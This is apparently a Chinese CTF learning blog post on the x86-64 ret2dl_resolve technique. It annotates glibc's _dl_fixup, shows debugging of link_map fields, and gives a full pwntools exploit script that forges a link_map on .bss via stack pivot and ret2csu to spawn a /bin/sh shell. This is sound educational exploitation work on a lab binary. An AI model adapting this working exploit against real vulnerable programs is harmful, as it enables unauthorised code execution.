  assert (ELFW(R_TYPE)(reloc-&gt;r_info) == ELF_MACHINE_JMP_SLOT);


   <span class="hljs-comment">/* Look up the target symbol.  If the normal lookup rules are not
      used don't look in the global scope.  */</span>
      
  <span class="hljs-keyword">if</span> (__builtin_expect (ELFW(ST_VISIBILITY) (sym-&gt;st_other), <span class="hljs-number">0</span>) == <span class="hljs-number">0</span>)   <span class="hljs-comment">//判断(sym-&gt;st_other)&amp;0x03是否为0</span>
    {
      <span class="hljs-keyword">const</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">r_found_version</span> *<span class="hljs-title">version</span> = <span class="hljs-title">NULL</span>;</span>

      <span class="hljs-keyword">if</span> (l-&gt;l_info[VERSYMIDX (DT_VERSYM)] != <span class="hljs-literal">NULL</span>)
	{
	  <span class="hljs-function"><span class="hljs-keyword">const</span> <span class="hljs-title">ElfW</span><span class="hljs-params">(Half)</span> *vernum </span>=
	    (<span class="hljs-keyword">const</span> <span class="hljs-keyword">void</span> *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
	  ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc-&gt;r_info)] &amp; <span class="hljs-number">0x7fff</span>;    
      <span class="hljs-comment">//64位下没法伪造reloc_arg的原因：(reloc-&gt;r_info)&gt;&gt;32作为vernum下标取值容易出现非法内存访问</span>
      <span class="hljs-comment">//大佬的解释：64位程序bss段被映射到0x600000,我们伪造的.dynsym也在0x600000+,而DT_SYM结构体中的d_ptr还是在0x400000,这就意味着我们的r_info必然很大，再加上数据类型大小的不同，导致(reloc-&gt;r_info)&gt;&gt;32作为vernum下标取值时十分容易访问到0x400000和0x600000之间的不可读区域</span>

      <span class="hljs-comment">/*
      #define ELF64_R_SYM(i)            ((i) &gt;&gt; 32)
      #define ELF64_R_TYPE(i)            ((i) &amp; 0xffffffff)
      */</span>

	  version = &amp;l-&gt;l_versions[ndx];
	  <span class="hljs-keyword">if</span> (version-&gt;hash == <span class="hljs-number">0</span>)
	    version = <span class="hljs-literal">NULL</span>;
	}

      <span class="hljs-comment">/* We need to keep the scope around so do some locking.  This is
	 not necessary for objects which cannot be unloaded or when
	 we are not using any threads (yet).  */</span>
      <span class="hljs-keyword">int</span> flags = DL_LOOKUP_ADD_DEPENDENCY;
      <span class="hljs-keyword">if</span> (!RTLD_SINGLE_THREAD_P)
	{
	  THREAD_GSCOPE_SET_FLAG ();
	  flags |= DL_LOOKUP_GSCOPE_LOCK;
	}

<span class="hljs-meta">#<span class="hljs-meta-keyword">ifdef</span> RTLD_ENABLE_FOREIGN_CALL</span>
      RTLD_ENABLE_FOREIGN_CALL;
<span class="hljs-meta">#<span class="hljs-meta-keyword">endif</span></span>

    <span class="hljs-comment">/* 通过 strtab+sym-&gt;st_name 找到函数对应的字符串，result为libc_base */</span>
      result = _dl_lookup_symbol_x (strtab + sym-&gt;st_name, l, &amp;sym, l-&gt;l_scope,
				    version, ELF_RTYPE_CLASS_PLT, flags, <span class="hljs-literal">NULL</span>);

      <span class="hljs-comment">/* We are done with the global scope.  */</span>
      <span class="hljs-keyword">if</span> (!RTLD_SINGLE_THREAD_P)
	THREAD_GSCOPE_RESET_FLAG ();

<span class="hljs-meta">#<span class="hljs-meta-keyword">ifdef</span> RTLD_FINALIZE_FOREIGN_CALL</span>
      RTLD_FINALIZE_FOREIGN_CALL;
<span class="hljs-meta">#<span class="hljs-meta-keyword">endif</span></span>

      <span class="hljs-comment">/* Currently result contains the base load address (or link map)
	 of the object that defines sym.  Now add in the symbol
	 offset.  */</span>
     <span class="hljs-comment">/* 函数的真实地址 = libc_base(result) + 偏移地址*/</span>
      value = DL_FIXUP_MAKE_VALUE (result,
				   SYMBOL_ADDRESS (result, sym, <span class="hljs-literal">false</span>));
    }
  <span class="hljs-keyword">else</span>
    {
      <span class="hljs-comment">/* We already found the symbol.  The module (and therefore its load
	 address) is also known.  */</span>
      value = DL_FIXUP_MAKE_VALUE (l, SYMBOL_ADDRESS (l, sym, <span class="hljs-literal">true</span>));
      result = l;
    }

  <span class="hljs-comment">/* And now perhaps the relocation addend.  */</span>
  value = elf_machine_plt_value (l, reloc, value);

  <span class="hljs-keyword">if</span> (sym != <span class="hljs-literal">NULL</span>
      &amp;&amp; __builtin_expect (ELFW(ST_TYPE) (sym-&gt;st_info) == STT_GNU_IFUNC, <span class="hljs-number">0</span>))
    value = elf_ifunc_invoke (DL_FIXUP_VALUE_ADDR (value));

  <span class="hljs-comment">/* Finally, fix up the plt itself.  */</span>
  <span class="hljs-keyword">if</span> (__glibc_unlikely (GLRO(dl_bind_not)))
    <span class="hljs-keyword">return</span> value;

<span class="hljs-comment">/* 将函数的真实地址写入got表对应的表项，value为真实地址、rel_addr为需要写入的got表地址 */</span>
  <span class="hljs-keyword">return</span> elf_machine_fixup_plt (l, result, refsym, sym, reloc, rel_addr, value);
}
</div></code></pre>
<h4 id="ret2dlresolvex86-64-%E9%87%8D%E5%AE%9A%E5%90%91%E6%B5%81%E7%A8%8B">ret2dl_resolve_x86-64 重定向流程</h4>
<ul>
<li>通过struct link_map *l获取 <em>.dynsym  .dynstr  .rel.plt</em> 地址</li>
<li>将.rel.plt地址与reloc_offset相加，得到函数所对应的Elf64_Rel指针，记作reloc</li>
<li>将(reloc-&gt;r_info)&gt;&gt;32作为.dynsym下标，得到函数所对应的Elf64_Sym指针，记作sym</li>
<li>检查r_info最低位是否为7</li>
<li>判断(sym-&gt;st_other)&amp;0x03是否为0</li>
<li>通过 strtab+sym-&gt;st_name 在字符串表中找到函数对应的字符串，然后把真实地址赋给rel_addr（rel_addr指向got表中的对应位置），最后控制权交给这个函数，执行。</li>
</ul>
<h2 id="%E8%B7%9F%E8%B8%AA%E8%B0%83%E8%AF%95">跟踪调试</h2>
<p>跟着之前的大师傅们调试一波</p>
<h3 id="%E8%BF%90%E8%A1%8C%E6%97%B6%E6%9F%A5%E7%9C%8Bdynamic">运行时查看.dynamic</h3>
<p><img src="https://s1.ax1x.com/2020/06/11/tHDPq1.png" alt=""></p>
<h3 id="vmmap">vmmap</h3>
<p><img src="https://s1.ax1x.com/2020/06/11/tHrf1g.png" alt=""></p>
<h3 id="%E8%BF%9B%E5%85%A5dlfixup">进入_dl_fixup</h3>
<p><img src="https://s1.ax1x.com/2020/06/11/tHsoxe.png" alt="">
<img src="https://s1.ax1x.com/2020/06/11/tH6mkt.png" alt="">
这里拿到函数对应的Elf64_Sym地址
<img src="https://s1.ax1x.com/2020/06/11/tHWJJI.png" alt="">
看雪上有师傅计算过，当作为数组下标时（64位），很容易出现非法内存访问。这里我就不算了。
贴上大师傅的解释：
<em>const ElfW(Sym) const symtab = 0x400280
const ElfW(Half) vernum = 0x4003d8
(r_info&gt;&gt;32)作为symtab的下标时，其值大于0x600000小于0x601000,也就是说0x1553a&lt;(r_info&gt;&gt;32)≤0x15fe5
(r_info&gt;&gt;32)作为vernum下标时，要使得不产生非法内存访问，需要0≤(r_info&gt;&gt;32)≤0x614或者0xffe14≤(r_info&gt;&gt;32)≤0x100614
无法找到同时满足二者的(r_info&gt;&gt;32)的值</em></p>
<h2 id="%E4%BC%AA%E9%80%A0linkmap%E6%94%BB%E5%87%BB">伪造link_map攻击</h2>
<h3 id="%E7%BB%95%E8%BF%87%E6%A3%80%E6%9F%A5">绕过检查</h3>
<p>64位和32位比，最容易出问题的就是这里</p>
<pre class="hljs"><code><div><span class="hljs-keyword">if</span> (l-&gt;l_info[VERSYMIDX (DT_VERSYM)] != <span class="hljs-literal">NULL</span>)
	{
	  <span class="hljs-function"><span class="hljs-keyword">const</span> <span class="hljs-title">ElfW</span><span class="hljs-params">(Half)</span> *vernum </span>=
	    (<span class="hljs-keyword">const</span> <span class="hljs-keyword">void</span> *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
	  ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc-&gt;r_info)] &amp; <span class="hljs-number">0x7fff</span>;    
      <span class="hljs-comment">//64位下没法伪造reloc_arg的原因：(reloc-&gt;r_info)&gt;&gt;32作为vernum下标取值容易出现非法内存访问</span>

      <span class="hljs-comment">/*
      #define ELF64_R_SYM(i)            ((i) &gt;&gt; 32)
      #define ELF64_R_TYPE(i)            ((i) &amp; 0xffffffff)
      */</span>

	  version = &amp;l-&gt;l_versions[ndx];
	  <span class="hljs-keyword">if</span> (version-&gt;hash == <span class="hljs-number">0</span>)
	    version = <span class="hljs-literal">NULL</span>;
	}

</div></code></pre>
<p>而<code>l-&gt;l_info[VERSYMIDX (DT_VERSYM)]</code>对应的就是</p>
<pre class="hljs"><code><div>mov rax, qword ptr [r10 + 0x1c8]
</div></code></pre>
<p>那么我们通过控制<em>link_map + 0x1c8</em>的值就可以绕过这个if，再来看一下这一段整个的情况：</p>
<pre class="hljs"><code><div>   <span class="hljs-comment">/* Look up the target symbol.  If the normal lookup rules are not
      used don't look in the global scope.  */</span>
<span class="hljs-keyword">if</span> (__builtin_expect (ELFW(ST_VISIBILITY) (sym-&gt;st_other), <span class="hljs-number">0</span>) == <span class="hljs-number">0</span>)<span class="hljs-comment">//判断(sym-&gt;st_other)&amp;0x03是否为0</span>
    {
      <span class="hljs-keyword">const</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">r_found_version</span> *<span class="hljs-title">version</span> = <span class="hljs-title">NULL</span>;</span>

      <span class="hljs-keyword">if</span> (l-&gt;l_info[VERSYMIDX (DT_VERSYM)] != <span class="hljs-literal">NULL</span>) <span class="hljs-comment">//mov rax, qword ptr [r10 + 0x1c8]</span>
        {
            <span class="hljs-comment">/*省略*/</span>
        }
    }

<span class="hljs-keyword">else</span>
    {
      <span class="hljs-comment">/* We already found the symbol.  The module (and therefore its load
	 address) is also known.  */</span>
      value = DL_FIXUP_MAKE_VALUE (l, SYMBOL_ADDRESS (l, sym, <span class="hljs-literal">true</span>));
      result = l;
    }
</div></code></pre>
<p>当我们将(sym-&gt;st_other)&amp;0x03设置为非0时，会进入else语句，此时else中通过<code>DL_FIXUP_MAKE_VALUE</code>来获取函数的真实地址，所以<strong>我们只需要将l-&gt;l_addr + sym-&gt;st_value指向system语句即可进入system函数（具体可以看我前面总结的那几个关键的宏，他们是一层一层调用的，最终简化出来就是这个式子）</strong></p>
<hr>
<p><strong>PS:</strong>
可能到这里很多人都忘了l和sym到底是什么了。。来复习一下，l是指向link_map的指针，sym是</p>
<pre class="hljs"><code><div> <span class="hljs-function"><span class="hljs-keyword">const</span> <span class="hljs-title">ElfW</span><span class="hljs-params">(Sym)</span> *sym 
   </span>= &amp;symtab[ELFW(R_SYM) (reloc-&gt;r_info)];
    <span class="hljs-comment">//将(reloc-&gt;r_info)&gt;&gt;32作为.dynsym下标，得到函数所对应的Elf64_Sym指针，记作sym</span>
</div></code></pre>
<p>而link_map结构体大致如下：</p>
<pre class="hljs"><code><div><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">link_map</span>
  {</span>
    ElfW(Addr) l_addr;                <span class="hljs-comment">/* Base address shared object is loaded at.  */</span>
    <span class="hljs-keyword">char</span> *l_name;                     <span class="hljs-comment">/* Absolute file name object was found in.  */</span>
    ElfW(Dyn) *l_ld;                  <span class="hljs-comment">/* Dynamic section of the shared object.  */</span>
    <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">link_map</span> *<span class="hljs-title">l_next</span>, *<span class="hljs-title">l_prev</span>;</span> <span class="hljs-comment">/* Chain of loaded objects.  */</span>
    <span class="hljs-comment">//......省略一大堆</span>
  };
</div></code></pre>
<p>其实link_map是个超级大的结构体<img src="https://s1.ax1x.com/2020/06/11/tbs9ot.png" alt=""></p>
<hr>
<p>但是当我们不知道system函数的地址时，可以采用以下方法：<strong>让sym-&gt;st_value等于某个got上已经解析了的函数的那一表项，然后l-&gt;l_addr设置为system与这个函数的偏移值</strong>，此外，伪造link_map我们还需要伪造：<em>位于link_map+0x70的DT_SYMTAB指针、link_map+0xf8的DT_JMPREL指针，另外strtab必须是个可读的地址，因此我们还需要伪造位于link_map+0x68的DT_STRTAB指针。之后就是伪造.dynamic中的DT_SYMTAB结构体和DT_JMPREL结构体以及函数所对应的Elf64_Rela结构体。为了方便，在构造的过程中一般将reloc_arg作为0来进行构造。</em></p>
<ul>
<li>已知link_map地址<em>0x7ffff7ffe168</em>，我们看一下link_map+0x70<img src="https://s1.ax1x.com/2020/06/11/tbqwNV.png" alt=""></li>
<li>再对照一下 <em>.dynamic</em>段中的内容,没问题：<img src="https://s1.ax1x.com/2020/06/11/tbqWAx.png" alt=""></li>
<li><em>通过跟踪dl_fixup 函数发现，dl_fixup引用了link_map+0x68/0x70/0xf8处的3个值来寻找STRTAB/SYMTAB/JMPREL这3个表。</em></li>
</ul>
<h2 id="exp%E7%BC%96%E5%86%99">EXP编写</h2>
<pre class="hljs"><code><div><span class="hljs-comment"># encoding=utf-8</span>
<span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *


context.log_level=<span class="hljs-string">'debug'</span>
context.terminal=<span class="hljs-string">'/bin/zsh'</span>

libc = ELF(<span class="hljs-string">"./libc-2.23.so"</span>)
elf = ELF(<span class="hljs-string">"./ret2-dl"</span>)

bss = elf.bss()
log.info(<span class="hljs-string">".bss :0x%X"</span>%bss)
write_addr = bss+<span class="hljs-number">0xac0</span>    <span class="hljs-comment"># 这里要调试一下，rsp有可能落在非bss上</span>
rbp = write_addr<span class="hljs-number">-0x8</span>
fake_link_map_addr = write_addr+<span class="hljs-number">0x18</span>
vuln_addr = <span class="hljs-number">0x0000000000400687</span>
pop7ret = <span class="hljs-number">0x000000000040073a</span>
mov3call = <span class="hljs-number">0x0000000000400720</span>
plt_load = <span class="hljs-number">0x4004e6</span> <span class="hljs-comment"># jmp</span>
read_got = elf.got[<span class="hljs-string">'read'</span>]

<span class="hljs-comment"># ELF64_sym_size = 0x18</span>
<span class="hljs-comment"># ELF64_Rela_size = 0x18</span>


<span class="hljs-string">'''
typedef struct            
{
    Elf64_Word    st_name;        /* Symbol name (string tbl index) */
      unsigned char    st_info;    /* Symbol type and binding */        
      unsigned char st_other;        /* Symbol visibility */              
      Elf64_Section    st_shndx;    /* Section index */                  
      Elf64_Addr    st_value;        /* Symbol value */                   
      Elf64_Xword    st_size;        /* Symbol size */                    
}Elf64_Sym;
 
typedef struct           
{
  Elf64_Addr    r_offset;        /* Address */                         
  Elf64_Xword    r_info;            /* Relocation type and symbol index */
  Elf64_Sxword    r_addend;        /* Addend */                          
}Elf64_Rela;
 
typedef struct          
{
  Elf64_Sxword    d_tag;            /* Dynamic entry type */
  union
    {
      Elf64_Xword d_val;        /* Integer value */
      Elf64_Addr d_ptr;            /* Address value */
    } d_un;
}Elf64_Dyn;
'''</span>


<span class="hljs-comment">#fake_Elf64_Dyn_STR_addr = link_map +0x68  </span>
<span class="hljs-comment">#fake_Elf64_Dyn_SYM_addr = link_map +0x70  </span>
<span class="hljs-comment">#fake_Elf64_Dyn_JMPREL_addr = link_map +0xf8</span>


<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">get_fake_link_map</span><span class="hljs-params">(fake_link_map_addr,l_addr,st_value)</span>:</span>
  <span class="hljs-comment"># 给出各个指针的假地址</span>
  fake_Elf64_Dyn_STR_addr = p64(fake_link_map_addr)
  fake_Elf64_Dyn_SYM_addr = p64(fake_link_map_addr + <span class="hljs-number">0x8</span>)
  fake_Elf64_Dyn_JMPREL_addr = p64(fake_link_map_addr + <span class="hljs-number">0x18</span>)

  <span class="hljs-comment"># 伪造相关结构体</span>
  fake_Elf64_Dyn_SYM = flat(p64(<span class="hljs-number">0</span>),p64(st_value<span class="hljs-number">-8</span>))
  fake_Elf64_Dyn_JMPREL = flat(p64(<span class="hljs-number">0</span>),p64(fake_link_map_addr+<span class="hljs-number">0x28</span>)  )<span class="hljs-comment"># JMPREL指向.rel.plt地址，放在fake_link_map_addr+0x28</span>
  r_offset = fake_link_map_addr - l_addr
  log.info(<span class="hljs-string">"r_offset :"</span>+str(hex(r_offset)))
  fake_Elf64_rela = flat(p64(r_offset),p64(<span class="hljs-number">7</span>),p64(<span class="hljs-number">0</span>))

  <span class="hljs-comment"># fake_link_map整体结构</span>
  fake_link_map = flat(   <span class="hljs-comment"># 0x0</span>
    p64(l_addr),          <span class="hljs-comment"># 0x8</span>
    fake_Elf64_Dyn_SYM,   <span class="hljs-comment"># 0x18</span>
    fake_Elf64_Dyn_JMPREL,<span class="hljs-comment"># 0x28</span>
    fake_Elf64_rela,      <span class="hljs-comment"># 0x40</span>
    <span class="hljs-string">"\x00"</span>*<span class="hljs-number">0x28</span>,         <span class="hljs-comment"># 0x68，下面开始放指针</span>
    fake_Elf64_Dyn_STR_addr,  <span class="hljs-comment"># STRTAB指针,0x70</span>
    fake_Elf64_Dyn_SYM_addr,  <span class="hljs-comment"># SYMTAB指针,0x78</span>
    <span class="hljs-string">"/bin/sh\x00"</span>.ljust(<span class="hljs-number">0x80</span>,<span class="hljs-string">"\x00"</span>),
    fake_Elf64_Dyn_JMPREL_addr, <span class="hljs-comment"># JMPREL指针</span>
  )
  <span class="hljs-keyword">return</span> fake_link_map
  





l_addr = libc.sym[<span class="hljs-string">'system'</span>] - libc.sym[<span class="hljs-string">'__libc_start_main'</span>] <span class="hljs-comment"># l-&gt;l_addr设置为 system 与 __libc_start_main 的偏移值,此时__libc_start_main是一个已经解析过的函数</span>
log.info(<span class="hljs-string">"l_addr :"</span>+str(hex(l_addr)))
log.info(<span class="hljs-string">"elf.got['__libc_start_main'] :"</span>+str(hex(elf.got[<span class="hljs-string">'__libc_start_main'</span>])))
log.info(<span class="hljs-string">"plt_load :"</span>+str(hex(<span class="hljs-number">0x4004e6</span>)))
log.info(<span class="hljs-string">"write_addr :"</span>+str(hex(write_addr)))
<span class="hljs-comment">#l-&gt;l_addr + sym-&gt;st_value</span>
<span class="hljs-comment"># value = DL_FIXUP_MAKE_VALUE (l, l-&gt;l_addr + sym-&gt;st_value);</span>
st_value = elf.got[<span class="hljs-string">'__libc_start_main'</span>]
fake_link_map = get_fake_link_map(fake_link_map_addr,l_addr,st_value)

io = process(<span class="hljs-string">"./ret2-dl"</span>)

<span class="hljs-comment"># 1. 首先，利用栈迁移，把fake_link_map放在bss段上</span>
rop = flat( <span class="hljs-string">'a'</span>*<span class="hljs-number">0x70</span>,  <span class="hljs-comment"># 此时到达老rbp</span>
            p64(rbp),
            p64(pop7ret),
            p64(<span class="hljs-number">0</span>),
            p64(<span class="hljs-number">1</span>),
            p64(read_got),  <span class="hljs-comment"># 重新调用read函数  r12</span>
            p64(len(fake_link_map)+<span class="hljs-number">0x18</span>+<span class="hljs-number">0x10</span>),   <span class="hljs-comment"># read读入长度 </span>
            p64(write_addr),                  <span class="hljs-comment"># read读入位置  </span>
            p64(<span class="hljs-number">0</span>),                               <span class="hljs-comment"># </span>
            p64(mov3call),
            p64(<span class="hljs-number">0</span>)*<span class="hljs-number">7</span> ,                        <span class="hljs-comment"># 补位</span>
            p64(vuln_addr)                       <span class="hljs-comment"># 再返回vuln函数</span>
)
log.info(hex(len(fake_link_map)+<span class="hljs-number">0x18</span>+<span class="hljs-number">0x10</span>))
io.sendline(rop)        <span class="hljs-comment"># 此rop中包含了ret2csu，利用其向bss上读数据</span>

sleep(<span class="hljs-number">1</span>)

<span class="hljs-comment"># 2. 接下来，由于我们在rop中利用ret2csu调用了read函数，我们开始向bss上读数据，以下数据内容是由rop中ret2csu调用的read函数读取的。</span>
fake = flat(
            p64(plt_load),
            p64(fake_link_map_addr),
            p64(<span class="hljs-number">0</span>),
            fake_link_map      <span class="hljs-comment"># fake_link_map本体</span>
)
log.info(hex(len(fake)))
io.sendline(fake)
attach(io)
pause()
pop_rdi_ret = <span class="hljs-number">0x0000000000400743</span>
leave = <span class="hljs-number">0x4006a6</span>
stack_mig = flat(
            <span class="hljs-string">'a'</span>*<span class="hljs-number">0x70</span>,
            p64(rbp),
            p64(pop_rdi_ret),
            p64(fake_link_map_addr+<span class="hljs-number">0x78</span>), <span class="hljs-comment"># /bin/sh</span>
            p64(leave)
)
sleep(<span class="hljs-number">1</span>)
io.sendline(stack_mig)

io.interactive()


</div></code></pre>
<h2 id="%E5%90%8E%E7%BB%AD%E5%A5%87%E6%80%AA%E7%9A%84%E8%B0%83%E8%AF%95%E4%BB%A5%E5%8F%8A64%E4%BD%8D32%E4%BD%8D%E7%9A%84%E4%B8%80%E4%B8%AA%E5%B7%AE%E5%88%AB">后续奇怪的调试以及64位32位的一个差别</h2>
<ul>
<li>在编写exp的时候，遇到了一些诡异的问题，比如一开始想把他放在bss+0x500，结果。。<img src="https://s1.ax1x.com/2020/06/13/tvPj1g.jpg" alt="">出现了诡异的非法内存访问。。在64位下调用的是<code>_dl_runtime_resolve_xsavec</code>,这个函数起始是有写地址操作的。但是按理说我应该把他已经放上bss了而bss是可读可写的，看一下这个时候的rsp，确实落在一个不可写的区间，并且这个区间是相对bss有偏移的。<img src="https://s1.ax1x.com/2020/06/13/tviI8U.jpg" alt=""></li>
<li>leave之后确实栈被拉到了bss+0x500<img src="https://s1.ax1x.com/2020/06/13/tvF5dI.png" alt=""></li>
<li>一直到进入<code>_dl_runtime_resolve_xsavec</code>都是没问题的。看来问题就是出在下面那两条指令上了。<img src="https://s1.ax1x.com/2020/06/13/tvk16e.png" alt=""></li>
<li>找到罪魁祸首了,偏移就是这条sub指令造成的<img src="https://s1.ax1x.com/2020/06/13/tvkvcD.png" alt=""></li>
<li>在32位下，ret2dl调用的是：<code>_dl_runtime_resolve</code>，如图<img src="https://s1.ax1x.com/2020/06/13/tvAyvD.png" alt=""></li>
<li><strong>而64位下，ret2dl调用</strong><code>_dl_runtime_resolve_xsavec</code>，如图：<img src="https://s1.ax1x.com/2020/06/13/tvAWVA.png" alt=""><strong>明显对rsp有一个sub操作，偏移就是他造成的。这次也算是踩坑了，以后也记住了要考虑一下这个玩意。。</strong></li>
</ul>

</body>
</html>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
        <div class="post-widgets">
        
          <div class="wp_rating">
            <div id="wpac-rating"></div>
          </div>
        

        
        </div>
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/06/10/TaLpwn-learning-ret2dl-64/" rel="next" title="TaLCTF ret2dl_resolve_x86-64">
                <i class="fa fa-chevron-left"></i> TaLCTF ret2dl_resolve_x86-64
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            Overview
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="https://avatars2.githubusercontent.com/u/48941180?s=460&u=c99ae53e7dd15c30c6283cc36edb2f8825ce8aec&v=4"
               alt="Paxos" />
          <p class="site-author-name" itemprop="name">Paxos</p>
           
              <p class="site-description motion-element" itemprop="description"></p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives/">
                <span class="site-state-item-count">11</span>
                <span class="site-state-item-name">posts</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">5</span>
                <span class="site-state-item-name">categories</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              
                <span class="site-state-item-count">6</span>
                <span class="site-state-item-name">tags</span>
              
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/OrangeGzY" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                    
                      GitHub
                    
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="mailto:guoziyi114@gmail.com" target="_blank" title="E-Mail">
                  
                    <i class="fa fa-fw fa-envelope"></i>
                  
                    
                      E-Mail
                    
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-block">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              友情链接
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="https://stevelee477.github.io/" title="Stevelee477(全栈大佬)" target="_blank">Stevelee477(全栈大佬)</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://minhal.me" title="Minhal(二进制爷爷👴)" target="_blank">Minhal(二进制爷爷👴)</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AFret2dl%E6%94%BB%E5%87%BB"><span class="nav-number">1.</span> <span class="nav-text">什么是ret2dl攻击</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%95%B4%E4%B8%AA%E8%B0%83%E7%94%A8%E8%BF%87%E7%A8%8B%E6%A2%B3%E7%90%86"><span class="nav-number">2.</span> <span class="nav-text">整个调用过程梳理</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#dlfixup%E4%B9%8B%E5%89%8D"><span class="nav-number">2.1.</span> <span class="nav-text">_dl_fixup之前</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#dlfixup%E8%BF%9B%E5%85%A5%E4%BB%A5%E5%90%8E"><span class="nav-number">2.2.</span> <span class="nav-text">_dl_fixup进入以后</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#dynamic"><span class="nav-number">2.2.1.</span> <span class="nav-text">.dynamic</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#dynsym"><span class="nav-number">2.2.2.</span> <span class="nav-text">.dynsym</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#dynstr"><span class="nav-number">2.2.3.</span> <span class="nav-text">.dynstr</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#relplt"><span class="nav-number">2.2.4.</span> <span class="nav-text">.rel.plt</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#linkmap%E7%BB%93%E6%9E%84"><span class="nav-number">2.2.5.</span> <span class="nav-text">link_map结构</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#dptr%E5%AE%8F"><span class="nav-number">2.2.6.</span> <span class="nav-text">D_PTR宏</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#elfw%E5%AE%8F"><span class="nav-number">2.2.7.</span> <span class="nav-text">ELFW宏</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#dlfixupmakevalue%E5%AE%8F"><span class="nav-number">2.2.8.</span> <span class="nav-text">DL_FIXUP_MAKE_VALUE宏</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#symboladdress%E5%AE%8F"><span class="nav-number">2.2.9.</span> <span class="nav-text">SYMBOL_ADDRESS宏</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#lookupvalueaddress%E5%AE%8F"><span class="nav-number">2.2.10.</span> <span class="nav-text">LOOKUP_VALUE_ADDRESS宏</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#elfmachinefixupplt%E5%87%BD%E6%95%B0"><span class="nav-number">2.2.11.</span> <span class="nav-text">elf_machine_fixup_plt函数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#x86-64%E4%B8%8B%E5%AF%B9%E4%BA%8Erelocarg%E7%9A%84%E7%89%B9%E6%AE%8Adefine"><span class="nav-number">2.2.12.</span> <span class="nav-text">x86-64下对于reloc_arg的特殊define</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#dlfixup%E6%BA%90%E7%A0%81%E9%98%85%E8%AF%BB"><span class="nav-number">2.2.13.</span> <span class="nav-text">_dl_fixup源码阅读</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#ret2dlresolvex86-64-%E9%87%8D%E5%AE%9A%E5%90%91%E6%B5%81%E7%A8%8B"><span class="nav-number">2.2.14.</span> <span class="nav-text">ret2dl_resolve_x86-64 重定向流程</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%B7%9F%E8%B8%AA%E8%B0%83%E8%AF%95"><span class="nav-number">3.</span> <span class="nav-text">跟踪调试</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%BF%90%E8%A1%8C%E6%97%B6%E6%9F%A5%E7%9C%8Bdynamic"><span class="nav-number">3.1.</span> <span class="nav-text">运行时查看.dynamic</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#vmmap"><span class="nav-number">3.2.</span> <span class="nav-text">vmmap</span></a></li><li 